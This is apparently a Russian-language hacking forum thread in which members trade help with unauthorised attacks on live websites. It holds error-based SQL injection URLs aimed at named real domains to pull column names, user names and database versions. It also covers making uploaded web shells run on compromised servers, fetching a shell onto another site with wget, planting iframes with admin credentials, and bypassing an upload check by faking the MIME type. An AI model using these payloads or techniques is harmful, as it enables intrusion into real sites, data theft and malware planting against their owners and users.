Есть слепая sql, не могу вывести из таблицы поля, помогите. Таблица ollis, смотрю так же inf_sch, что не то? http://www.ollis.ru/index.php?rest=-1') union select * FROM (select * FROM (select NAME_CONST((select column_name FROM information_schema.columns LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select column_name FROM information_schema.columns LIMIT 1), 14)e) b)a--+
обычная скуля мускульная , только скрипт на coldfusion и, походу, требует чтоб ID был цифровой - внедрить что-либо нельзя (это просто предположение, исходя из того что ты дал)
Как сказал попугай, это просто ошибка из-за того что GET параметр ID не числовой, это так принято выводить ошибки в ASP.NET, и т.п. системах )
А зачем получать именно в таком виде ошибку? Главное же, что вывод данных есть. Можно данные ещё конкатенизировать с какими-то символами, провоцирующими ошибку при exec.
порутал сервер,когда заливаю на сайты шеллы и потом обращаюсь к ним из веба,то выдает такую ошибку - Code: UID of script "/home/*****/public_html/shell.php" is smaller than min_uid выставил чмоды и выдает уже такую ошибку - Code: File "/home/*****/public_html/shell.php" is writeable by group как сделать что бы шелл нормально работал?
GID of script "/home/*****/public_html/wso2.php" is smaller than min_gid UPD: chown username:username * -R , так заработало wget http://yoursite.ru/shell.php -O yaneshell.php xeksite.ru/yaneshell.php
Скажите, как можно имея ник и пасс админа, изменить исходный код сайта (например ифрейм поставить)? На сайте не возможно залогинится. Как можно реализовать?
Имеется такой код: Получается, проверяется только тип, передаваемый браузером. Т.е. можно сформировать фейковый пакет с типом image/gif, а заливать любой файл, так?
Не понял )).Ну,как бы команды wget,lynx,source никто не отменял.И вообще,консолей много всяких...может,ты вообще сидел за терминалом рядом с системником?)))) ЗЫ: Я так понял,у тебя bash/csh или чет такое.
Какбы там блайнд: http://www.simqam.com/products.php?cid=1+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(version(),floor(rand(0)*2)))--+ Result: Duplicate entry '5.0.67-log1'
Sorry за возможно глупый вопрос В блайндах всегда возможно только выводить по одной строке(значению) или есть такой запрос позволяющий выводить сразу столбом. FAQ я читал и не раз и не два т.е. например я делаю такой запрос +UNION+SELECT+*+FROM(SELECT%20*%20FROM%20(SELECT%20NAME_CONST((SELECT%20name%20FROM%20users%20LIMIT%200,1),%2014)d)+as+t+JOIN(SELECT%20NAME_CONST((SELECT%20name%20FROM%20users%20LIMIT%200,1),14)e)b)a%20-- выводит: Duplicate entry: qwerqwer Выводит только одно значение хоть с лимитом, хоть без него можно ли вывести данные целиком?
Мля, начал линки ис топика по скулям проверять ): Мне интересно стало http://site:3306 Вопрос 1: Как такое прыкрыть (рационально всмысле)!? Вопрос 2: Какие есть вариации каталога по умолчанию для выполнения cgi скриптов(и др. каталоги) у разных веб-серверов с компроментирующими даными ? сgi-bin/test.pl - например , денвер. результат - путь. Админы завтыкуют удалять. Воше не мешало б создать отдельный топик на этот вопрос и наверно предыдущий. Хоть и лоловский метод, но уже есть и версия мускула и путь!
Привет, как произвести инъекцию что бы вытащить хоть какую то инфу т.к не получается (новичок пока) урл палить не буду но вот какая ошибка:
